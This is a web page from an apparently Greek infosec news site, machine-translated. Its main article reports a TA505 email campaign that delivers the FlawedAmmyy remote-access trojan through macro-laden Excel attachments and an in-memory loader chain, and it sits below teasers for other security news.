White hat hacker is accused of hacking Bulgaria's tax office
infosec

White hat hacker is accused of hacking Bulgaria's tax office

An expert in the field of cyber security and white hat hacker, who is accused of hacking the data more than ...
Read More
infosec

FSB: Hackers have violated the Russian Security Service!

Hackers have violated the servers of the Russian Federal Security Service (FSB) by gaining access to 7.5 terabytes of data from a major Sybate FSB contractor. The...
Read More
infosec

Chrome & Firefox extensions stole millions of data

A huge leak of data was discovered by security researcher Sam Jidali and his team. Leakage came from 8 ...
Read More
infosec

The first Online Mobile Malware Observation for Android from Upstream

Secure-D, the Upstream security platform, the leading Greek technology company, launches the first online Mobile Malware Observatory with ...
Read More
infosec

Password Alert: 72% of users are recycling passwords!

Password Alert: Users recycle the same password on average four times, according to a Security.org report ....
Read More
Latest Posts

FlawedAmmyy RAT is transmitted through a malware campaign

RAT

As warned by microsoft, a newly discovered malicious campaign, targets its victims' systems to spread the notorious FlawedAmmmy RAT directly into memory.

FlawedAmmyy is one Trojan Remote Access (RAT), which allows attackers to gain full access to their victims' machines and move sideways to a network.

Trojan can intercept important information from a system such as login files and credentials, extract screenshots, and even allow a hacker to have access to the victim's computer camera.

The malicious agent associated with older campaigns that attempted to develop this malware is TA505, which is best known for distributing Dridex banking Trojan and ransomware Locky.

According to Microsoft reports, the attack begins with the sending of malicious emails containing attachments in .xls and Korean content.

As soon as the user opens the file, it automatically starts a macro operation to execute the legitimate msiexec.exe tool, which in turn downloads an MSI file.

Within this MSI file, attackers "hide an executable designed to decrypt and execute another executable file in memory as soon as it is opened.

"This executable file downloads and decrypts another file, wsus.exe, which you also sign digitally. Wsus.exe decrypts and runs the final payload directly into the memory. The final payload is Trojan FlawedAmmyy, "Microsoft Security Intelligence explains in one tweet her.

Earlier this month, Trend Micro referred to TA505 campaigns targeting various Latin American and Asian countries with FlawedAmmyy RAT and other RATs, revealing that the same infection mechanism has been used for over two months.

In fact, the malicious agent uses it backdoors such as FlawedAmmyy, Remote Manipulator (RMS), ServHelper and more for more than 6 months.

Share
Do you have an opinion? Leave your comment.

The author allows you to copy his / her text only if you report the source (SecNews.gr), as an e-mail address (Live URL) of the article.
Updated on by

Reader Interactions

Leave a reply

Your email address is not published. Τα υποχρεωτικά πεδία σημειώνονται με *